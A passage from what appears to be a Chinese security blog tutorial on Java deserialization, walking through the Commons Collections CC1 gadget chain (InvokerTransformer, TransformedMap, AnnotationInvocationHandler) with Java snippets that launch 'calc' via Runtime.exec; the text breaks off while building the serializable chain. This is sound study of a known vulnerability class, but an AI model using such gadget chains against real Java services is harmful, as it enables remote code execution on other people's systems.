<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="Java反序列化之CommonsCollections, Ethe&#39;s blog">
    <meta name="description" content="Commons CollectionsApache Commons Collections包和简介 | 闪烁之狐 (blinkfox.github.io)
背景介绍Apache Commons是Apache软件基金会的项目，曾经隶属于Jak">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>Java反序列化之CommonsCollections | Ethe&#39;s blog</title>
    <link rel="icon" type="image/png" href="https://epicture.oss-cn-beijing.aliyuncs.com/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/css/matery.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/css/my.css">

    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/jquery/jquery-3.6.0.min.js"></script>
    <script src="https://sdk.jinrishici.com/v2/browser/jinrishici.js" charset="utf-8"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>



   <style>
    body{
       background-image: url(https://cdn.jsdelivr.net/gh/Tokisaki-Galaxy/res/site/medias/background.jpg);
       background-repeat:no-repeat;
       background-size: cover;
       background-attachment:fixed;
    }
</style>



<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Ethe&#39;s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Ethe&#39;s blog</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://epicture.oss-cn-beijing.aliyuncs.com/medias/featureimages/20.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">Java反序列化之CommonsCollections</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: scroll;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }
    #toc-content .is-active-link::before {
        background-color: #42b983;
    }
    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }
    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/web%E5%AD%A6%E4%B9%A0/">
                                <span class="chip bg-color">web学习</span>
                            </a>
                        
                            <a href="/tags/Java/">
                                <span class="chip bg-color">Java</span>
                            </a>
                        
                            <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
                                <span class="chip bg-color">反序列化</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2023-03-19
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2023-03-21
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    7.9k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    34 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="Commons-Collections"><a href="#Commons-Collections" class="headerlink" title="Commons Collections"></a>Commons Collections</h1><p><a target="_blank" rel="noopener" href="https://blinkfox.github.io/2018/09/13/hou-duan/java/commons/commons-collections-bao-he-jian-jie/">Apache Commons Collections包和简介 | 闪烁之狐 (blinkfox.github.io)</a></p>
<h2 id="背景介绍"><a href="#背景介绍" class="headerlink" title="背景介绍"></a>背景介绍</h2><p><a target="_blank" rel="noopener" href="http://commons.apache.org/">Apache Commons</a>是Apache软件基金会的项目，曾经隶属于<code>Jakarta</code>项目。<code>Commons</code>的目的是提供可重用的、解决各种实际的通用问题且开源的Java代码。Commons由三部分组成：<code>Proper</code>（是一些已发布的项目）、<code>Sandbox</code>（是一些正在开发的项目）和<code>Dormant</code>（是一些刚启动或者已经停止维护的项目）。</p>
<p><a target="_blank" rel="noopener" href="http://commons.apache.org/proper/commons-collections/">Commons Collections</a>包为Java标准的<code>Collections API</code>提供了相当好的补充。在此基础上对其常用的数据结构操作进行了很好的封装、抽象和补充。让我们在开发应用程序的过程中，既保证了性能，同时也能大大简化代码。</p>
<h2 id="Collections的包结构和简单介绍"><a href="#Collections的包结构和简单介绍" class="headerlink" title="Collections的包结构和简单介绍"></a>Collections的包结构和简单介绍</h2><ul>
<li><code>org.apache.commons.collections</code> – CommonsCollections自定义的一组公用的接口和工具类</li>
<li><code>org.apache.commons.collections.bag</code> – 实现Bag接口的一组类</li>
<li><code>org.apache.commons.collections.bidimap</code> – 实现BidiMap系列接口的一组类</li>
<li><code>org.apache.commons.collections.buffer</code> – 实现Buffer接口的一组类</li>
<li><code>org.apache.commons.collections.collection</code> –实现java.util.Collection接口的一组类</li>
<li><code>org.apache.commons.collections.comparators</code>– 实现java.util.Comparator接口的一组类</li>
<li><code>org.apache.commons.collections.functors</code> –Commons Collections自定义的一组功能类</li>
<li><code>org.apache.commons.collections.iterators</code> – 实现java.util.Iterator接口的一组类</li>
<li><code>org.apache.commons.collections.keyvalue</code> – 实现集合和键/值映射相关的一组类</li>
<li><code>org.apache.commons.collections.list</code> – 实现java.util.List接口的一组类</li>
<li><code>org.apache.commons.collections.map</code> – 实现Map系列接口的一组类</li>
<li><code>org.apache.commons.collections.set</code> – 实现Set系列接口的一组类</li>
</ul>
<pre class="language-none"><code class="language-none">* *********** 常用类  ***********
* 1. org.apache.commons.collections4.CollectionUtils
*      isEmpty 判断集合是否为空
*      isNotEmpty 判断集合不为空
*      isEqualCollection 比较两集合值是否相等, 不考虑元素的顺序
*      union 并集, 不会去除重复元素
*      intersection 交集
*      disjunction 交集的补集
*      subtract 差集, 不去重
*      unmodifiableCollection 得到一个集合镜像，不允许修改，否则报错
*      containsAny 判断两个集合是否有相同元素
*      getCardinalityMap 统计集合中各元素出现的次数，并以Map&lt;Object, Integer&gt;输出
*      isSubCollection a是否 b 的子集合, a集合大小 &lt;&#x3D; b集合大小
*      isProperSubCollection a是否 b 的子集合, a集合大小 &lt; b集合大小
*      cardinality 某元素在集合中出现的次数
*      find 返回集合中满足函数式的唯一元素，只返回最先处理符合条件的唯一元素, 以废弃
*      filter 过滤集合中满足函数式的所有元素
*      transform 转换新的集合，对集合中元素进行操作，如每个元素都累加1
*      countMatches 返回集合中满足函数式的数量
*      select 将满足表达式的元素存入新集合中并返回新集合元素对象
*      selectRejected 将不满足表达式的元素存入新集合中并返回新集合元素对象
*      collect  collect底层调用的transform方法, 将所有元素进行处理，并返回新的集合
*      addAll  将一个数组或集合中的元素全部添加到另一个集合中
*      get 返回集合中指定下标元素
*      isFull 判断集合是否为空
*      maxSize 返回集合最大空间
*      predicatedCollection 只要集合中元素不满足表达式就抛出异常
*      removeAll 删除集合的子集合
*      synchronizedCollection 同步集合
*
* 2. org.apache.commons.collections4.MapUtils
*      isEmpty 判断Map是否为空
*      isNotEmpty 判断Map是否不为空
*      getBoolean 从Map中获取 Boolean, 其重载方法有三个参数, 表示如果转换失败则使用默认值
*      getBooleanValue 从Map中获取 boolean, 其重载方法有三个参数, 表示如果转换失败则使用默认值
*      getDouble 从Map中获取 Double, 其重载方法有三个参数, 表示如果转换失败则使用默认值
*      getDoubleValue 从Map中获取 double, 其重载方法有三个参数, 表示如果转换失败则使用默认值
*      getFloat 从Map中获取 Float, 其重载方法有三个参数, 表示如果转换失败则使用默认值
*      getFloatValue 从Map中获取 float, 其重载方法有三个参数, 表示如果转换失败则使用默认值
*      getInteger 从Map中获取 Integer, 其重载方法有三个参数, 表示如果转换失败则使用默认值
*      getIntegerValue 从Map中获取 int, 其重载方法有三个参数, 表示如果转换失败则使用默认值
*      getLong 从Map中获取 Long, 其重载方法有三个参数, 表示如果转换失败则使用默认值
*      getLongValue 从Map中获取 long, 其重载方法有三个参数, 表示如果转换失败则使用默认值
*      getString 从Map中获取 String, 其重载方法有三个参数, 表示如果转换失败则使用默认值
*      getMap 获取Map类型的值
*      putAll 将二维数组放入Map中
*
*&#x2F;</code></pre>

<h1 id="CC1"><a href="#CC1" class="headerlink" title="CC1"></a>CC1</h1><p>关于cc1的反序列化，网上一般有两条链子，一个就是ysoserial中的lazymap链，还有transformedmap链</p>
<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><ul>
<li><a target="_blank" rel="noopener" href="https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html">JDK8u65</a>（高版本jdk中AnnotationinvocationHandler的readObject被重写了</li>
<li>[openJDK 8u65](<a target="_blank" rel="noopener" href="https://hg.openjdk.org/jdk8u/jdk8u/jdk/rev/af660750b2f4">jdk8u/jdk8u/jdk: af660750b2f4 (openjdk.org)</a>)</li>
<li>Maven</li>
</ul>
<p>后面的具体配置可以看<a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1no4y1U7E1/?spm_id_from=333.999.0.0&vd_source=053f03b424a45370bc5813843ae5268f">Java反序列化CommonsCollections篇(一) CC1链手写EXP_哔哩哔哩_bilibili</a>和<a target="_blank" rel="noopener" href="https://drun1baby.top/2022/06/06/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96Commons-Collections%E7%AF%8701-CC1%E9%93%BE/#toc-heading-2">Java反序列化Commons-Collections篇01-CC1链 | 芜风 (drun1baby.top)</a></p>
<h2 id="执行类分析"><a href="#执行类分析" class="headerlink" title="执行类分析"></a>执行类分析</h2><p>我们要先了解一下在cc1里实现了Transformer接口的几个方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319190319370.png" alt="image-20230319190319370"></p>
<p><strong>ChainedTransformer</strong>：输入对象将传递给第一个转换器。转换后的结果将传递给第二个转换器，依此类推。类似递归的操作，每次转换的输出结果将作为下一次转换的输入。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320091529005.png" alt="image-20230320091529005"></p>
<p><strong>InvokerTransformer</strong>：通过反射创建新的对象实例的转换器实现。InvokerTransformer 是 Apache Commons Collections 库中的一个类，它可以通过反射机制调用指定对象的指定方法，并返回方法执行结果。它是一个转换器（Transformer）实现，用于将输入对象转换为调用指定方法后的返回值。</p>
<p>InvokeTransformer重写的transform函数是cc1链的关键点</p>
<p><strong>ConstantTransformer</strong> ：它是一个转换器（Transformer）实现，用于将输入对象转换为一个固定的常量值。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320091719221.png" alt="image-20230320091719221"></p>
<p>这里我们先重点说一下InvokerTransformer</p>
<p>InvokerTransformer的有参构造需要三个参数</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319191555790.png" alt="image-20230319191555790"></p>
<p>这三个参数在transform方法里都有用到，从这里我们能分别看出这三个函数的作用。methodName是需要获取的方法名，paramTypes是这个方法的参数类型，args参数则是它的参数列表。同时input也是transform的形参，也就是说是，我们可以利用InvokerTransformer.transform以反射的方式去调用一些其他的方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319191708721.png" alt="image-20230319191708721"></p>
<p>然后我们试着去调用Runtime</p>
<p>首先正常使用是</p>
<pre class="language-java" data-language="java"><code class="language-java">Runtime.getRuntime().exec(&quot;calc&quot;);</code></pre>

<p>通过反射则是</p>
<pre class="language-java" data-language="java"><code class="language-java">Runtime runtime &#x3D; Runtime.getRuntime();
&#x2F;&#x2F;获得类对象
Class r &#x3D; Runtime.class;
&#x2F;&#x2F;获得exec方法
Method exec &#x3D; r.getMethod(&quot;exec&quot;, String.class);
&#x2F;&#x2F;执行calc命令
exec.invoke(runtime,&quot;calc&quot;);</code></pre>

<p>利用InvokerTransformer.transform执行命令</p>
<pre class="language-java" data-language="java"><code class="language-java">Runtime runtime &#x3D; Runtime.getRuntime();

new InvokerTransformer(&quot;exec&quot;,new Class[]&#123;String.class&#125;,new Object[]&#123;&quot;calc&quot;&#125;).transform(runtime);</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319193947552.png" alt="image-20230319193947552"></p>
<p>那么假设我们在序列化中传入了InvokerTransformer类，如果在反序列化的过程中，有能够触发transform的地方，不就可以实现命令执行了吗？</p>
<p>现在我们已经找完反序列化中的执行类了，接下来就需要去找有没有哪里调用了transform</p>
<p>这里能够利用的地方一共有两处，分别是LazyMap和TransformedMap，这也造成了cc1的两条链</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319194549513.png" alt="image-20230319194549513"></p>
<h2 id="TransformedMap链"><a href="#TransformedMap链" class="headerlink" title="TransformedMap链"></a>TransformedMap链</h2><h3 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h3><pre class="language-java" data-language="java"><code class="language-java">&#x2F;&#x2F;transformValue方法
protected Object transformValue(Object object) &#123;
    if (valueTransformer &#x3D;&#x3D; null) &#123;
        return object;
    &#125;
    return valueTransformer.transform(object);
&#125;</code></pre>

<pre class="language-java" data-language="java"><code class="language-java">&#x2F;&#x2F;checkSetValue方法
protected Object checkSetValue(Object value) &#123;
    return valueTransformer.transform(value);
&#125;</code></pre>

<pre class="language-java" data-language="java"><code class="language-java">&#x2F;&#x2F;transformKey方法
protected Object transformKey(Object object) &#123;
    if (keyTransformer &#x3D;&#x3D; null) &#123;
        return object;
    &#125;
    return keyTransformer.transform(object);
&#125;</code></pre>

<p>这三处调用transform的方法其实根本上都差不多，都是调用keyTransformer或valueTransformer的transform方法，而keyTransformer和valueTransformer在构造函数中都进行了赋值</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319195321514.png" alt="image-20230319195321514"></p>
<p><strong>TransformedMap</strong>：TransformedMap 是 Apache Commons Collections 框架中的一个类，它实现了一个 Map 接口，可以对其所包含的键值对进行转换操作。可以在原有的 Map 对象的基础上，提供一种能够对键或值进行自定义转换的方式。具体来说，TransformedMap 实例将会对 get、put 和 containsKey 方法进行重载，从而在访问 Map 中的键值对时，通过指定的转换器来对键或值进行转换操作。</p>
<p>这个构造方法是protected类型的，所以类中肯定还有其他方法调用了这个构造方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319201341859.png" alt="image-20230319201341859"></p>
<p>decorate这个静态方法我们可以很方便的调用，接下来只要找到有调用checkSetValue、transformValue、transformKey三个方法其中之一的我们可以利用的函数就也可以执行命令了。</p>
<p>满足这个条件的其实在TransformedMap 下就有一个</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319201716424.png" alt="image-20230319201716424"></p>
<p>调用了transformValue和transformKey，利用这个我们可以再写出一种在不直接调用InvokerTransformer.transform方法的命令执行路径</p>
<pre class="language-java" data-language="java"><code class="language-java">Runtime runtime &#x3D; Runtime.getRuntime();

InvokerTransformer exec &#x3D; new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;);
HashMap map &#x3D; new HashMap();
&#x2F;&#x2F;可以触发两次&#x2F;&#x2F;将keyTransformer和valueTransformer都成为exec，实际上put之后就会变成transform(exec)
Map decorate &#x3D; TransformedMap.decorate(map, exec, exec);
Object calc &#x3D; decorate.put(runtime, runtime);</code></pre>

<p>如果我们能再找到调用了put方法的函数，可能也能找到一条反序列化的利用链。</p>
<p>不过这和我们的TransformedMap 链没有关系，我们要利用的是第三个函数checkSetValue，</p>
<p>在AbstractInputCheckedMapDecorator抽象类中的一个静态类MapEntry中的setValue方法中就调用了checkSetValue方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319202421645.png" alt="image-20230319202421645"></p>
<p>那接下来我们就需要去找哪里能够触发AbstractInputCheckedMapDecorator.MapEntry.setValue()</p>
<p>MapEntry是AbstractMapEntryDecorator的子类，而AbstractMapEntryDecorator又实现了Map.Entry接口，可以看出MapEntry中的setValue方法其实就是Entry中的setValue方法的重写</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320092545105.png" alt="image-20230320092545105"></p>
<p>当 TransformedMap执行transformedMap.entrySet()得到的entry[]数组元素都是AbstractInputCheckedMapDecorator类的对象,</p>
<p>可以通过执行以下代码,在entry.setValue打断点确认entry的类型</p>
<pre class="language-java" data-language="java"><code class="language-java">public class test &#123;
    public static void main(String[] args) &#123;
        Runtime runtime &#x3D; Runtime.getRuntime();
        HashMap&lt;Object, Object&gt; map &#x3D; new HashMap&lt;&gt;();
        map.put(&quot;set_key&quot;, &quot;set_value&quot;);
        Transformer invokerTransformer &#x3D;new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;);;
        Map&lt;Object, Object&gt; transformedMap &#x3D; TransformedMap.decorate(map, null, invokerTransformer);
        for (Map.Entry entry : transformedMap.entrySet()) &#123;
            entry.setValue(runtime);
        &#125;

    &#125;
&#125;</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319205617940.png" alt="image-20230319205617940"></p>
<p>这里entry是AbstractInputCheckedMapDecorator类型的，所以这里的<code>setValue()</code><strong>实际上就是在 Map 中对一组 entry（键值对）</strong>进行<code>setValue()</code>操作。</p>
<p>所以触发AbstractInputCheckedMapDecorator.MapEntry.setValue()的方式我们也清楚了，<strong>对Map进行遍历并调用setValue就可以了</strong></p>
<p>而在AnnotationinvocationHandler的readObject方法中，恰好有这样一个既遍历了Map，又对Map.Entry调用了setValue方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319211536405.png" alt="image-20230319211536405"></p>
<p>我们再看一下AnnotationinvocationHandler</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319214819709.png" alt="image-20230319214819709"></p>
<p>在构造方法中需要两个参数，一个是继承了Annotation的类对象，另一个是Map类型的值，这个map就是我们调用TransformedMap.decorate后返回的数值。</p>
<p>而且由于这个类不是public类型的，所以需要利用反射去实例化</p>
<p>到这里我们的整个利用链就已经可以整理出来了</p>
<p>入口类是AnnotationinvocationHandler</p>
<p>执行类是InvokerTransformer </p>
<p>AnnotationinvocationHandler -&gt; readObject</p>
<p>AbstractInputCheckedMapDecorator.MapEntry -&gt; setValue</p>
<p>TransformedMap -&gt; checkSetValue</p>
<p>InvokerTransformer -&gt; transform</p>
<h3 id="完善"><a href="#完善" class="headerlink" title="完善"></a>完善</h3><p>我们找到了入口类，利用链，执行类，看起来已经完美了，但是仍存在一些问题需要我们去解决</p>
<p>首先，Runtime对象是我们自己生成的，不能进行序列化</p>
<p>其次，AnnotationinvocationHandler 的readObject函数中还有两个if判断需要我们去解决</p>
<p>最后，setValue中的内容应该是我们要调用的对象，而不是</p>
<pre class="language-none"><code class="language-none">new AnnotationTypeMismatchExceptionProxy(
    value.getClass() + &quot;[&quot; + value + &quot;]&quot;).setMember(
        annotationType.members().get(name))</code></pre>



<h4 id="一、Runtime不能进行序列化"><a href="#一、Runtime不能进行序列化" class="headerlink" title="一、Runtime不能进行序列化"></a>一、Runtime不能进行序列化</h4><p>如果Runtime不能序列化，那么我们想要执行的命令也就无法进行序列化，不能通过反序列化达到命令执行的目的</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230320110929217.png" alt="image-20230320110929217"></p>
<p>但是，虽然Runtime不能进行序列化，可Runtime.class可以</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319220849369.png" alt="image-20230319220849369"></p>
<p>所以我们同样可以利用反射和InvokerTransformer.transform方法达到能够将我们想要执行的命令进行序列化的目的</p>
<pre class="language-java" data-language="java"><code class="language-java">&#x2F;&#x2F;        Class&lt;Runtime&gt; rc &#x3D; Runtime.class;
&#x2F;&#x2F;        Method getRuntime &#x3D; rc.getMethod(&quot;getRuntime&quot;);
        Method getMethod &#x3D; (Method) new InvokerTransformer(&quot;getMethod&quot;, new Class[]&#123;String.class, Class[].class&#125;, new Object[]&#123;&quot;getRuntime&quot;, null&#125;).transform(Runtime.class);
&#x2F;&#x2F;        Runtime runtime &#x3D; (Runtime)getRuntime.invoke(null);&#x2F;&#x2F;getRuntime是静态方法，所以invoke的第一个参数可以写null
